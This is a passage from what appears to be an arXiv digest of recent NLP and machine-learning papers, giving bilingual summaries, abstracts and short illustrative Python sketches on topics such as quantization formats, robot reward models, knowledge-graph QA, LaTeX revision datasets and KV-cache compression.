Abstract:Multi-Agent Path Finding (MAPF) requires collision-free trajectories for multiple agents on a shared graph, often with the objective of minimizing the sum-of-costs (SOC). Many optimal and bounded-suboptimal solvers rely on time-expanded models and centralized conflict resolution, which limits scalability in large or dense instances. We propose a hybrid prioritized framework that separates geometric planning from execution-time conflict resolution. In the first stage, Geometric Conflict Preemption (GCP) plans agents sequentially with A* on the original graph while inflating costs for transitions entering vertices used by higher-priority paths, encouraging spatial detours without explicit time reasoning. In the second stage, a Decentralized Local Controller (DLC) executes the geometric paths using per-vertex FIFO authorization queues and inserts wait actions only when required to avoid vertex and edge-swap conflicts. Experiments on standard benchmark maps with up to 1000 agents show that the method scales with an empirically near-linear runtime trend and attains a 100% success rate on instances satisfying the geometric feasibility assumption. On bottleneck-heavy maps, GCP reduces synchronization-induced waiting and often improves SOC.
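GCP第一阶段"对进入高优先级路径顶点的转移做成本膨胀"的做法,可以在普通最短路搜索上直接示意(这里用Dijkstra代替带启发式的A*,罚值大小为演示取值):

```python
import heapq

def plan_with_preemption(graph, start, goal, occupied, penalty=10.0):
    """Sequential-priority planning sketch: edges *entering* a vertex on a
    higher-priority agent's path pay `penalty`, steering later agents onto
    spatial detours with no time-expanded search. `graph` maps a vertex to
    a list of (neighbor, edge_cost) pairs."""
    dist, prev = {start: 0.0}, {}
    heap = [(0.0, start)]
    while heap:
        d, u = heapq.heappop(heap)
        if u == goal:
            path = [u]
            while u != start:
                u = prev[u]
                path.append(u)
            return path[::-1]
        if d > dist.get(u, float("inf")):
            continue
        for v, w in graph[u]:
            nd = d + w + (penalty if v in occupied else 0.0)
            if nd < dist.get(v, float("inf")):
                dist[v], prev[v] = nd, u
                heapq.heappush(heap, (nd, v))
    return None
```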
自然语言处理
[NLP-0] Adaptive Block-Scaled Data Types
【速读】: 该论文旨在解决NVFP4(NVIDIA Floating Point 4)在量化大语言模型时因误差分布不均导致的性能瓶颈问题,尤其是每16个值为一组时,靠近最大值的数值会引入显著的量化误差。其解决方案的关键在于设计一种自适应块缩放数据类型——IF4(Int/Float 4),该类型对每组16个值动态选择使用FP4或INT4表示,并通过E4M3缩放因子进行统一处理;通过复用NVFP4中未使用的缩放因子符号位来标记所选的数据类型,从而在保持硬件兼容性的同时提升量化精度。该方法在量化训练和后训练量化任务中均表现出优于现有4-bit格式的性能,且可高效集成至下一代硬件加速器中。
链接: https://arxiv.org/abs/2603.28765
作者: Jack Cook,Hyemin S. Lee,Kathryn Le,Junxian Guo,Giovanni Traverso,Anantha P. Chandrakasan,Song Han
机构: Massachusetts Institute of Technology (麻省理工学院); NVIDIA
类目: Computation and Language (cs.CL)
备注: 19 pages, 9 figures
Abstract:NVFP4 has grown increasingly popular as a 4-bit format for quantizing large language models due to its hardware support and its ability to retain useful information with relatively few bits per parameter. However, the format is not without limitations: recent work has shown that NVFP4 suffers from its error distribution, resulting in large amounts of quantization error on near-maximal values in each group of 16 values. In this work, we leverage this insight to design new Adaptive Block-Scaled Data Types that can adapt to the distribution of their input values. For four-bit quantization, our proposed IF4 (Int/Float 4) data type selects between FP4 and INT4 representations for each group of 16 values, which are then scaled by an E4M3 scale factor as is done with NVFP4. The selected data type is denoted using the scale factor’s sign bit, which is currently unused in NVFP4, and we apply the same insight to design formats for other bit-widths, including IF3 and IF6. When used to quantize language models, we find that IF4 outperforms existing 4-bit block-scaled formats, achieving lower loss during quantized training and achieving higher accuracy on many tasks in post-training quantization. We additionally design and evaluate an IF4 Multiply-Accumulate (MAC) unit to demonstrate that IF4 can be implemented efficiently in next-generation hardware accelerators. Our code is available at this https URL.
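IF4"每组在FP4与INT4之间二选一、并借用缩放因子符号位记录所选类型"的核心逻辑可以模拟如下。E2M1幅值表按FP4常见约定选取,其余细节(真实的E4M3缩放、组大小16)在此为演示而简化;函数仅比较两种表示的量化误差。

```python
FP4_MAGNITUDES = [0.0, 0.5, 1.0, 1.5, 2.0, 3.0, 4.0, 6.0]   # E2M1
INT4_MAGNITUDES = [float(i) for i in range(8)]               # 0..7

def quantize(magnitudes, values, scale):
    """Round each value to the nearest representable magnitude times the
    group scale, preserving sign."""
    out = []
    for v in values:
        q = min(magnitudes, key=lambda m: abs(m - abs(v) / scale))
        out.append(q * scale * (1.0 if v >= 0 else -1.0))
    return out

def if4_quantize(group):
    """Per-group data-type selection in the spirit of IF4: try both grids,
    keep the one with lower squared error. The returned tag stands in for
    the scale factor's sign bit that would encode the choice in hardware."""
    amax = max(abs(v) for v in group) or 1.0
    fp4 = quantize(FP4_MAGNITUDES, group, amax / 6.0)
    int4 = quantize(INT4_MAGNITUDES, group, amax / 7.0)
    sq_err = lambda q: sum((a - b) ** 2 for a, b in zip(group, q))
    return ("FP4", fp4) if sq_err(fp4) <= sq_err(int4) else ("INT4", int4)
```

这一选择规则与摘要提到的NVFP4误差分布一致:组内数值普遍接近最大值时,等距的INT4网格在大幅值附近更细、误差更小;而存在大量小值时,FP4在零附近的密集网格占优。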
[NLP-1] SOLE-R1: Video-Language Reasoning as the Sole Reward for On-Robot Reinforcement Learning
【速读】: 该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在强化学习(Reinforcement Learning, RL)中作为奖励信号时,因部分可观测性和分布偏移导致的鲁棒性不足问题,即模型易被策略利用感知错误而非真正完成任务。解决方案的关键在于提出一种名为SOLE-R1(Self-Observing LEarner)的视频-语言推理模型,该模型通过每帧进行时空链式思维(spatiotemporal chain-of-thought, CoT)推理,直接生成稠密的任务进展估计值作为奖励信号,从而实现无需真实奖励、成功指标或任务特定调优的零样本在线强化学习。其核心创新包括:大规模视频轨迹与推理合成数据集、融合空间与多帧时序推理的基础能力,以及结合监督微调与可验证奖励强化学习的混合训练框架。
链接: https://arxiv.org/abs/2603.28730
作者: Philip Schroeder,Thomas Weng,Karl Schmeckpeper,Eric Rosen,Stephen Hart,Ondrej Biza
机构: 未知
类目: Robotics (cs.RO); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language models (VLMs) have shown impressive capabilities across diverse tasks, motivating efforts to leverage these models to supervise robot learning. However, when used as evaluators in reinforcement learning (RL), today’s strongest models often fail under partial observability and distribution shift, enabling policies to exploit perceptual errors rather than solve the task. To address this limitation, we introduce SOLE-R1 (Self-Observing LEarner), a video-language reasoning model explicitly designed to serve as the sole reward signal for online RL. Given only raw video observations and a natural-language goal, SOLE-R1 performs per-timestep spatiotemporal chain-of-thought (CoT) reasoning and produces dense estimates of task progress that can be used directly as rewards. To train SOLE-R1, we develop a large-scale video trajectory and reasoning synthesis pipeline that generates temporally grounded CoT traces aligned with continuous progress supervision. This data is combined with foundational spatial and multi-frame temporal reasoning, and used to train the model with a hybrid framework that couples supervised fine-tuning with RL from verifiable rewards. Across four different simulation environments and a real-robot setting, SOLE-R1 enables zero-shot online RL from random initialization: robots learn previously unseen manipulation tasks without ground-truth rewards, success indicators, demonstrations, or task-specific tuning. SOLE-R1 succeeds on 24 unseen tasks and substantially outperforms strong vision-language rewarders, including GPT-5 and Gemini-3-Pro, while exhibiting markedly greater robustness to reward hacking.
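摘要称SOLE-R1逐时刻输出任务进度估计并将其直接用作奖励;把进度序列转为稠密奖励的一种常见做法是取一阶差分(即进度增量),如下所示。这只是一种标准的shaping选择,摘要并未明确论文采用的具体换算规则。

```python
def progress_to_rewards(progress):
    """Convert per-timestep task-progress estimates (in [0, 1]) into a
    dense reward sequence via first differences: the agent is rewarded
    for progress gained and penalized for progress lost."""
    return [p1 - p0 for p0, p1 in zip(progress, progress[1:])]
```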
[NLP-2] EpiScreen: Early Epilepsy Detection from Electronic Health Records with Large Language Models
【速读】: 该论文旨在解决癫痫(epilepsy)与心因性非癫痫发作(psychogenic non-epileptic seizures, PNES)临床表现相似但诊疗策略迥异所导致的误诊问题,此类误诊常引发诊断延迟、不当治疗及患者不良预后。解决方案的关键在于开发一种名为EpiScreen的低成本、高效筛查工具,其核心是利用电子健康记录中常规收集的临床文书,通过在标注文本数据上微调大语言模型(large language models),实现对癫痫的早期识别。该方法在MIMIC-IV数据集上达到0.875的AUC,在明尼苏达大学私有队列中更是高达0.980,并在医生与AI协同决策场景下使神经科专家性能提升最高达10.9%,从而为资源受限地区提供可扩展的早期筛查方案,缩短诊断周期并减少不必要的干预。
链接: https://arxiv.org/abs/2603.28698
作者: Shuang Zhou,Kai Yu,Zaifu Zhan,Huixue Zhou,Min Zeng,Feng Xie,Zhiyi Sha,Rui Zhang
机构: 未知
类目: Computation and Language (cs.CL)
备注: 24 pages, 5 figures, 4 tables
Abstract:Epilepsy and psychogenic non-epileptic seizures often present with similar seizure-like manifestations but require fundamentally different management strategies. Misdiagnosis is common and can lead to prolonged diagnostic delays, unnecessary treatments, and substantial patient morbidity. Although prolonged video-electroencephalography is the diagnostic gold standard, its high cost and limited accessibility hinder timely diagnosis. Here, we developed a low-cost, effective approach, EpiScreen, for early epilepsy detection by utilizing routinely collected clinical notes from electronic health records. Through fine-tuning large language models on labeled notes, EpiScreen achieved an AUC of up to 0.875 on the MIMIC-IV dataset and 0.980 on a private cohort of the University of Minnesota. In a clinician-AI collaboration setting, EpiScreen-assisted neurologists outperformed unaided experts by up to 10.9%. Overall, this study demonstrates that EpiScreen supports early epilepsy detection, facilitating timely and cost-effective screening that may reduce diagnostic delays and avoid unnecessary interventions, particularly in resource-limited regions.
[NLP-3] ResAdapt: Adaptive Resolution for Efficient Multimodal Reasoning
【速读】: 该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在处理高时空分辨率视频时面临的视觉token膨胀问题,即在保持高空间分辨率和长时序上下文的同时难以维持计算效率。其核心挑战在于输入编码器接收的像素量过大,而非后续表示压缩方式不足。解决方案的关键是提出ResAdapt——一个输入侧自适应框架,通过引入轻量级Allocator模块,在编码前动态分配每帧的视觉预算(visual budget),从而优化资源分配。该框架将分配策略建模为上下文相关的Bandit问题,并采用成本感知策略优化(Cost-Aware Policy Optimization, CAPO)方法,从稀疏的回放反馈中学习稳定且高效的准确率-成本权衡信号。实验表明,ResAdapt可在相同视觉预算下支持最多16倍帧数,同时在推理密集型任务中提升超过15%性能,显著逼近效率-准确率前沿。
链接: https://arxiv.org/abs/2603.28610
作者: Huanxuan Liao,Zhongtao Jiang,Yupu Hao,Yuqiao Tan,Shizhu He,Jun Zhao,Kun Xu,Kang Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: work in progress
Abstract:Multimodal Large Language Models (MLLMs) achieve stronger visual understanding by scaling input fidelity, yet the resulting visual token growth makes jointly sustaining high spatial resolution and long temporal context prohibitive. We argue that the bottleneck lies not in how post-encoding representations are compressed but in the volume of pixels the encoder receives, and address it with ResAdapt, an Input-side adaptation framework that learns how much visual budget each frame should receive before encoding. ResAdapt couples a lightweight Allocator with an unchanged MLLM backbone, so the backbone retains its native visual-token interface while receiving an operator-transformed input. We formulate allocation as a contextual bandit and train the Allocator with Cost-Aware Policy Optimization (CAPO), which converts sparse rollout feedback into a stable accuracy-cost learning signal. Across budget-controlled video QA, temporal grounding, and image reasoning tasks, ResAdapt improves low-budget operating points and often lies on or near the efficiency-accuracy frontier, with the clearest gains on reasoning-intensive benchmarks under aggressive compression. Notably, ResAdapt supports up to 16x more frames at the same visual budget while delivering over 15% performance gain. Code is available at this https URL.
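摘要将分辨率分配建模为上下文bandit,并用CAPO把稀疏的rollout反馈转为"准确率-成本"标量信号。下面给出一个去掉上下文、仅保留核心思想的ε-greedy示意:每个分辨率档位是一个臂,奖励为任务成败减去成本惩罚;权重λ与各数值均为演示假设,并非论文的具体目标函数。

```python
import random

def capo_style_reward(correct, cost, lam=0.1):
    """Scalar accuracy-cost feedback in the spirit of CAPO (illustrative,
    not the paper's exact objective)."""
    return (1.0 if correct else 0.0) - lam * cost

class BudgetAllocator:
    """Epsilon-greedy stand-in for the Allocator: one arm per visual
    budget tier, value estimates updated by incremental averaging."""
    def __init__(self, arms, eps=0.1, seed=0):
        self.q = {a: 0.0 for a in arms}
        self.n = {a: 0 for a in arms}
        self.eps = eps
        self.rng = random.Random(seed)

    def choose(self):
        if self.rng.random() < self.eps:
            return self.rng.choice(list(self.q))
        return max(self.q, key=self.q.get)

    def update(self, arm, reward):
        self.n[arm] += 1
        self.q[arm] += (reward - self.q[arm]) / self.n[arm]
```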
[NLP-4] Training data generation for context-dependent rubric-based short answer grading
[Quick Read]: This paper tackles the challenges of Automatic Student Answer Grading (ASAG), where language differences and grader bias make scoring difficult, and where training the relevant machine-learning models requires large amounts of domain-specific data. The key solution is to use a relatively small confidential reference dataset together with a set of very simple derived text formats to generate large-scale surrogate datasets: while preserving data confidentiality, the generated data is, at least superficially, more similar to the reference data than purely prompt-based generation, and early experiments suggest one of the approaches may also improve model training.
Link: https://arxiv.org/abs/2603.28537
Authors: Pavel Šindelář, Dávid Slivka, Christopher Bouma, Filip Prášil, Ondřej Bojar
Affiliations: Unknown
Categories: Computation and Language (cs.CL)
Comments:
Abstract:Every 4 years, the PISA test is administered by the OECD to test the knowledge of teenage students worldwide and allow for comparisons of educational systems. However, having to avoid language differences and annotator bias makes the grading of student answers challenging. For these reasons, it would be interesting to compare methods of automatic student answer grading. To train some of these methods, which require machine learning, or to compute parameters or select hyperparameters for those that do not, a large amount of domain-specific data is needed. In this work, we explore a small number of methods for creating a large-scale training dataset using only a relatively small confidential dataset as a reference, leveraging a set of very simple derived text formats to preserve confidentiality. Using these methods, we successfully created three surrogate datasets that are, at the very least, superficially more similar to the reference dataset than purely the result of prompt-based generation. Early experiments suggest one of these approaches might also lead to improved model training.
[NLP-5] Compressing Transformer Language Models via Matrix Product Operator Decomposition: A Case Study on PicoGPT
[Quick Read]: This paper addresses the compute and storage overhead of deploying Transformer-based language models on resource-constrained hardware, caused by parameter counts that scale quadratically with the hidden dimension. The key solution is structured compression of the Transformer's weight matrices via Matrix Product Operator (MPO) decomposition: each weight matrix is factorised into a chain of low-rank cores, with approximation quality controlled by the bond dimension χ, and training requires only standard PyTorch autograd with no custom backward pass. Experiments show that MPO compression substantially reduces parameter counts (up to 13x compression) while retaining strong language-modelling performance, and that at certain bond dimensions (e.g., χ=8) it achieves better accuracy per parameter than the dense baseline.
Link: https://arxiv.org/abs/2603.28534
Authors: Younes Javanmard, Tanmoy Pandit, Masoud Mardani
Affiliations: Leibniz Universität Hannover; VTT Technical Research Centre of Finland; National High Magnetic Field Laboratory
Categories: Computation and Language (cs.CL); Data Analysis, Statistics and Probability (physics.data-an)
Comments:
Abstract:Transformer-based language models achieve strong performance across NLP tasks, but their quadratic parameter scaling with hidden dimension makes deployment on resource-constrained hardware expensive. We study Matrix Product Operator (MPO) decomposition as a principled compression method for transformers. MPO factorises weight matrices into chains of low-rank cores, with approximation quality controlled by the bond dimension chi. We replace every this http URL layer in PicoGPT, a GPT-2-style character-level language model with about 1M parameters, with an MPOLinear module parameterised as an MPO chain. Cores are initialised either by TT-SVD from pretrained dense weights or from random initialisation, and trained using standard PyTorch autograd without a custom backward pass. We derive balanced factorisation schemes for the five distinct weight shapes in PicoGPT and evaluate bond dimensions chi in 4, 8, 16, 32 on Tiny Shakespeare. MPO compression achieves up to 13x compression per transformer block at chi = 4. At chi = 16, the model uses 191,872 parameters instead of 1,020,224 while retaining 97.7% of baseline token accuracy (51.6% vs 52.8%). Reconstruction error follows the expected trend and is lower for three-site than two-site factorisations at the same bond dimension. The chi = 8 model gives the best accuracy per parameter, exceeding the dense baseline by 2.7x on this metric. These results show that MPO parameterisation is a practical and theoretically grounded alternative to low-rank methods and unstructured pruning for transformer compression.
[NLP-6] GraphWalker: Agentic Knowledge Graph Question Answering via Synthetic Trajectory Curriculum
[Quick Read]: This paper targets two challenges in agentic knowledge graph question answering (KGQA): training-data scarcity that limits agent exploration, and poor reasoning generalization. Existing approaches restrict exploration: prompting-based methods lack autonomous-navigation training, while training pipelines confine reasoning to predefined trajectories. The key innovations of the proposed GraphWalker framework are Automated Trajectory Synthesis and Stage-wise Fine-tuning: a first SFT stage trains on structurally diverse trajectories synthesized from constrained random-walk paths to establish a broad knowledge-graph exploration prior, and a second SFT stage on a small set of expert trajectories equips the agent with reflection and error-recovery abilities. This two-stage training unlocks a higher performance ceiling for a lightweight reinforcement learning (RL) stage, achieving state-of-the-art results on CWQ and WebQSP, with stronger generalization to out-of-distribution reasoning paths confirmed on GrailQA and the newly constructed GraphWalkerBench.
Link: https://arxiv.org/abs/2603.28533
Authors: Shuwen Xu, Yao Xu, Jiaxiang Liu, Chenhao Yuan, Wenshuo Peng, Jun Zhao, Kang Liu
Affiliations: School of Artificial Intelligence, University of Chinese Academy of Sciences; Key Laboratory of Cognition and Decision Intelligence for Complex Systems, Institute of Automation, Chinese Academy of Sciences; Department of Electronic Engineering, Tsinghua University
Categories: Computation and Language (cs.CL)
Comments:
Abstract: Agentic knowledge graph question answering (KGQA) requires an agent to iteratively interact with knowledge graphs (KGs), posing challenges in both training data scarcity and reasoning generalization. Specifically, existing approaches often restrict agent exploration: prompting-based methods lack autonomous navigation training, while current training pipelines usually confine reasoning to predefined trajectories. To this end, this paper proposes GraphWalker, a novel agentic KGQA framework that addresses these challenges through Automated Trajectory Synthesis and Stage-wise Fine-tuning. GraphWalker adopts a two-stage SFT training paradigm: First, the agent is trained on structurally diverse trajectories synthesized from constrained random-walk paths, establishing a broad exploration prior over the KG; Second, the agent is further fine-tuned on a small set of expert trajectories to develop reflection and error recovery capabilities. Extensive experiments demonstrate that our stage-wise SFT paradigm unlocks a higher performance ceiling for a lightweight reinforcement learning (RL) stage, enabling GraphWalker to achieve state-of-the-art performance on CWQ and WebQSP. Additional results on GrailQA and our constructed GraphWalkerBench confirm that GraphWalker enhances generalization to out-of-distribution reasoning paths. The code is publicly available at this https URL
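A minimal sketch of what "constrained random-walk paths" over a KG can look like. The toy graph, relation names, and the no-revisit constraint below are illustrative assumptions, not the paper's exact sampler:

```python
import random

def random_walk_paths(graph, start, length, n_paths, rng):
    """Sample constrained random walks from an adjacency-list KG.

    `graph` maps an entity to a list of (relation, tail) edges. The
    constraint here is that a walk never revisits an entity, so each
    path is a simple exploration trace usable as a trajectory seed.
    """
    paths = []
    for _ in range(n_paths):
        node, visited, path = start, {start}, []
        for _ in range(length):
            candidates = [(r, t) for r, t in graph.get(node, [])
                          if t not in visited]
            if not candidates:
                break
            r, t = rng.choice(candidates)
            path.append((node, r, t))
            visited.add(t)
            node = t
        if path:
            paths.append(path)
    return paths

kg = {"Paris": [("capital_of", "France"), ("located_in", "Europe")],
      "France": [("member_of", "EU")],
      "EU": [("hq_in", "Brussels")]}
walks = random_walk_paths(kg, "Paris", length=3, n_paths=5,
                          rng=random.Random(0))
assert walks and all(w[0][0] == "Paris" for w in walks)
```

Each sampled path can then be verbalised into a question-trajectory pair for the first SFT stage.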
[NLP-7] EarlySciRev: A Dataset of Early-Stage Scientific Revisions Extracted from LaTeX Writing Traces LREC
[Quick Read]: This paper addresses the difficulty of obtaining early-stage revision traces in scientific writing, which limits empirical study of revision behaviour and the evaluation of large language models (LLMs) on scientific-writing tasks; existing public resources mostly expose only final or near-final versions of papers. The key idea is to exploit commented-out text in arXiv LaTeX source files, which often preserves discarded or alternative formulations written by the authors themselves: by aligning commented segments with nearby final text and applying LLM-based filtering, reliable paragraph-level revision pairs are extracted. The result is EarlySciRev, a dataset of 578k validated revision pairs grounded in authentic early drafting traces, supporting research on scientific-writing dynamics, revision modelling, and LLM-assisted editing.
Link: https://arxiv.org/abs/2603.28515
Authors: Léane Jourdan, Julien Aubert-Béduchaud, Yannis Chupin, Marah Baccari, Florian Boudin
Affiliations: Unknown
Categories: Computation and Language (cs.CL)
Comments: Accepted to NSLP@LREC
Abstract:Scientific writing is an iterative process that generates rich revision traces, yet publicly available resources typically expose only final or near-final versions of papers. This limits empirical study of revision behaviour and evaluation of large language models (LLMs) for scientific writing. We introduce EarlySciRev, a dataset of early-stage scientific text revisions automatically extracted from arXiv LaTeX source files. Our key observation is that commented-out text in LaTeX often preserves discarded or alternative formulations written by the authors themselves. By aligning commented segments with nearby final text, we extract paragraph-level candidate revision pairs and apply LLM-based filtering to retain genuine revisions. Starting from 1.28M candidate pairs, our pipeline yields 578k validated revision pairs, grounded in authentic early drafting traces. We additionally provide a human-annotated benchmark for revision detection. EarlySciRev complements existing resources focused on late-stage revisions or synthetic rewrites and supports research on scientific writing dynamics, revision modelling, and LLM-assisted editing.
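The core extraction idea, recovering commented-out draft text from LaTeX sources, can be sketched in a few lines. This simplified version considers only whole-line `%` comments and merges consecutive comment lines into one candidate segment; the actual pipeline additionally aligns segments with nearby final text and filters them with an LLM.

```python
import re

def commented_segments(latex_source):
    """Collect runs of commented-out LaTeX lines as candidate draft text.

    Only lines that are entirely comments (optionally indented) are
    considered; consecutive comment lines are merged into one segment.
    """
    segments, current = [], []
    for line in latex_source.splitlines():
        m = re.match(r"\s*%(.*)", line)
        if m:
            current.append(m.group(1).strip())
        else:
            if current:
                segments.append(" ".join(current))
                current = []
    if current:
        segments.append(" ".join(current))
    return segments

src = """We obtain strong results.
% We obtain promising results
% on two benchmarks.
Final version of the paragraph."""
print(commented_segments(src))  # ['We obtain promising results on two benchmarks.']
```

In the dataset's setting, each such segment would then be paired with the adjacent final text to form a candidate revision pair.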
[NLP-8] IEG-Youpu Solution for NeurIPS 2022 WikiKG90Mv2-LSC
[Quick Read]: This paper addresses the tension between efficiency and accuracy when embedding very large knowledge graphs (KGs) into continuous vector spaces. For WikiKG90Mv2, an encyclopedic KG with more than 90 million entities, the authors adopt a retrieve-then-re-rank pipeline: a priority infilling retrieval model first obtains structurally and semantically similar candidates, and an ensemble-based re-ranking model with neighbor-enhanced representations then produces the final link predictions. The staged design preserves efficient retrieval while substantially improving accuracy, raising validation-set Mean Reciprocal Rank (MRR) from 0.2342 to 0.2839.
Link: https://arxiv.org/abs/2603.28512
Authors: Feng Nie, Zhixiu Ye, Sifa Xie, Shuang Wu, Xin Yuan, Liang Yao, Jiazhen Peng, Xu Cheng
Affiliations: Tencent; Tsinghua University
Categories: Computation and Language (cs.CL)
Comments: 6 pages, 1 figure
Abstract: WikiKG90Mv2 in NeurIPS 2022 is a large encyclopedic knowledge graph. Embedding knowledge graphs into continuous vector spaces is important for many practical applications, such as knowledge acquisition, question answering, and recommendation systems. Compared to existing knowledge graphs, WikiKG90Mv2 is a large-scale knowledge graph composed of more than 90 million entities. Both efficiency and accuracy must be considered when building graph embedding models for a knowledge graph at this scale. To this end, we follow the retrieve-then-re-rank pipeline and make novel modifications in both the retrieval and re-ranking stages. Specifically, we propose a priority infilling retrieval model to obtain candidates that are structurally and semantically similar. We then propose an ensemble-based re-ranking model with neighbor-enhanced representations to produce final link prediction results among the retrieved candidates. Experimental results show that our proposed method outperforms existing baseline methods and improves the MRR of the validation set from 0.2342 to 0.2839.
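The reported metric, Mean Reciprocal Rank (MRR), averages the reciprocal rank of the first correct entity over all queries, with retrieval misses contributing zero. A minimal sketch (the query and entity names are made up):

```python
def mean_reciprocal_rank(ranked_candidates, gold):
    """MRR over queries: mean of 1/rank of the correct answer.

    `ranked_candidates` maps each query to its re-ranked entity list;
    `gold` maps each query to the correct entity. Queries whose gold
    entity is missing from the candidates contribute 0 (retrieval miss).
    """
    total = 0.0
    for q, candidates in ranked_candidates.items():
        if gold[q] in candidates:
            total += 1.0 / (candidates.index(gold[q]) + 1)
    return total / len(ranked_candidates)

preds = {"q1": ["e3", "e7", "e1"], "q2": ["e5", "e2"], "q3": ["e9"]}
gold = {"q1": "e7", "q2": "e5", "q3": "e4"}
print(mean_reciprocal_rank(preds, gold))  # (1/2 + 1 + 0) / 3 = 0.5
```

This also makes clear why the retrieval stage caps the achievable MRR: a gold entity absent from the candidate set can never be recovered by re-ranking.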
[NLP-9] Entropic Claim Resolution: Uncertainty-Driven Evidence Selection for RAG
[Quick Read]: This paper addresses the epistemic uncertainty that current Retrieval-Augmented Generation (RAG) systems face in knowledge-intensive, real-world scenarios with conflicting evidence or inherently ambiguous queries, where retrieving documents by semantic relevance alone cannot support reasoned decisions. The key solution, Entropic Claim Resolution (ECR), reframes RAG reasoning as entropy minimization over competing semantic answer hypotheses: it sequentially selects the most discriminative atomic evidence claims using Expected Entropy Reduction (EER), a decision-theoretic criterion for the value of information, and terminates retrieval once a mathematically defined state of epistemic sufficiency is reached (H = ε, subject to epistemic coherence). This shifts the paradigm from retrieving what is most relevant to retrieving what is most discriminative, providing a rigorous foundation for evidence selection under uncertainty.
Link: https://arxiv.org/abs/2603.28444
Authors: Davide Di Gioia
Affiliations: University College London
Categories: Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
Comments: Preprint
Abstract:Current Retrieval-Augmented Generation (RAG) systems predominantly rely on relevance-based dense retrieval, sequentially fetching documents to maximize semantic similarity with the query. However, in knowledge-intensive and real-world scenarios characterized by conflicting evidence or fundamental query ambiguity, relevance alone is insufficient for resolving epistemic uncertainty. We introduce Entropic Claim Resolution (ECR), a novel inference-time algorithm that reframes RAG reasoning as entropy minimization over competing semantic answer hypotheses. Unlike action-driven agentic frameworks (e.g., ReAct) or fixed-pipeline RAG architectures, ECR sequentially selects atomic evidence claims by maximizing Expected Entropy Reduction (EER), a decision-theoretic criterion for the value of information. The process dynamically terminates when the system reaches a mathematically defined state of epistemic sufficiency (H = epsilon, subject to epistemic coherence). We integrate ECR into a production-grade multi-strategy retrieval pipeline (CSGR++) and analyze its theoretical properties. Our framework provides a rigorous foundation for uncertainty-aware evidence selection, shifting the paradigm from retrieving what is most relevant to retrieving what is most discriminative.
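The EER criterion is the expected drop in entropy over answer hypotheses from observing one claim's outcome, i.e., the mutual information between hypothesis and outcome. A small sketch under assumed priors and per-claim likelihoods (the two-hypothesis setup is illustrative, not taken from the paper):

```python
import math

def entropy(p):
    return -sum(x * math.log2(x) for x in p if x > 0)

def expected_entropy_reduction(prior, likelihoods):
    """EER of checking one claim.

    `prior[h]` is the belief in hypothesis h; `likelihoods[h][o]` is the
    probability that the claim check yields outcome o under h. The value
    equals H(prior) minus the expected posterior entropy, and is >= 0.
    """
    n_outcomes = len(likelihoods[0])
    eer = entropy(prior)
    for o in range(n_outcomes):
        p_o = sum(prior[h] * likelihoods[h][o] for h in range(len(prior)))
        if p_o == 0:
            continue
        posterior = [prior[h] * likelihoods[h][o] / p_o
                     for h in range(len(prior))]
        eer -= p_o * entropy(posterior)
    return eer

prior = [0.5, 0.5]
discriminative = [[0.9, 0.1], [0.1, 0.9]]  # outcome separates hypotheses
uninformative = [[0.5, 0.5], [0.5, 0.5]]   # outcome says nothing
assert expected_entropy_reduction(prior, discriminative) > \
       expected_entropy_reduction(prior, uninformative)
assert abs(expected_entropy_reduction(prior, uninformative)) < 1e-12
```

Greedy selection by EER then prefers the discriminative claim, which is exactly the relevant-vs-discriminative distinction the abstract draws.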
[NLP-10] IsoQuant: Hardware-Aligned SO(4) Isoclinic Rotations for LLM KV Cache Compression
[Quick Read]: This paper addresses the excessive storage and compute cost of dense random orthogonal transforms in low-bit online vector quantization, where orthogonal feature decorrelation incurs O(d²) complexity. The key solution is IsoQuant, a blockwise rotation framework based on quaternion algebra and the isoclinic decomposition of SO(4): each 4D block is represented as a quaternion and rotated via the closed-form transform T(v) = q_L v q̄_R. Two variants are provided: IsoQuant-Full realizes the full SO(4) rotation for accuracy, while IsoQuant-Fast keeps only one isoclinic factor to reduce cost. At comparable reconstruction MSE, performance improves markedly: at d = 128, forward-rotation cost drops from about 2,408 FMAs in RotorQuant to 1,024 (Full) and 512 (Fast), with mean kernel-level speedups of 4.5-4.7x across a range of CUDA settings.
Link: https://arxiv.org/abs/2603.28430
Authors: Zhongping Ji
Affiliations: Unknown
Categories: Machine Learning (cs.LG); Computation and Language (cs.CL)
Comments: 11 pages
Abstract: Orthogonal feature decorrelation is effective for low-bit online vector quantization, but dense random orthogonal transforms incur prohibitive O(d^2) storage and compute. RotorQuant reduces this cost with blockwise 3D Clifford rotors, yet the resulting 3D partition is poorly aligned with modern hardware and offers limited local mixing. We propose IsoQuant, a blockwise rotation framework based on quaternion algebra and the isoclinic decomposition of SO(4). It represents each 4D block as a quaternion and applies a closed-form transform T(v) = q_L v \overline{q_R}. This yields two main variants: IsoQuant-Full, which realizes the full SO(4) rotation, and IsoQuant-Fast, which keeps only one isoclinic factor for lower cost; the framework also admits a lightweight 2D special case. At d = 128, IsoQuant-Full reduces forward rotation cost from about 2,408 FMAs in RotorQuant to 1,024, while IsoQuant-Fast further reduces it to 512. Across 18 fused CUDA settings with d ∈ {128, 256, 512}, bit widths {2, 3, 4}, and FP16/FP32 execution, IsoQuant achieves mean kernel-level speedups of about 4.5x to 4.7x over RotorQuant while maintaining comparable reconstruction MSE, with peak speedups above 6x. Current validation is limited to the stage-1 quantize-dequantize path on synthetic normalized vectors; end-to-end KV-cache evaluation remains future work.
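The closed-form transform T(v) = q_L v q̄_R can be written directly with Hamilton products. The reference sketch below (plain Python, not the fused CUDA kernel) applies it to one 4D block and checks the defining property of a rotation, norm preservation:

```python
import math

def qmul(a, b):
    """Hamilton product of quaternions given as (w, x, y, z) tuples."""
    aw, ax, ay, az = a
    bw, bx, by, bz = b
    return (aw*bw - ax*bx - ay*by - az*bz,
            aw*bx + ax*bw + ay*bz - az*by,
            aw*by - ax*bz + ay*bw + az*bx,
            aw*bz + ax*by - ay*bx + az*bw)

def conj(q):
    w, x, y, z = q
    return (w, -x, -y, -z)

def normalize(q):
    n = math.sqrt(sum(c * c for c in q))
    return tuple(c / n for c in q)

def so4_rotate(v, q_left, q_right):
    """Rotate a 4D block v via T(v) = q_L * v * conj(q_R). For unit
    quaternions this realizes a general SO(4) rotation (the isoclinic
    decomposition: left- and right-isoclinic factors)."""
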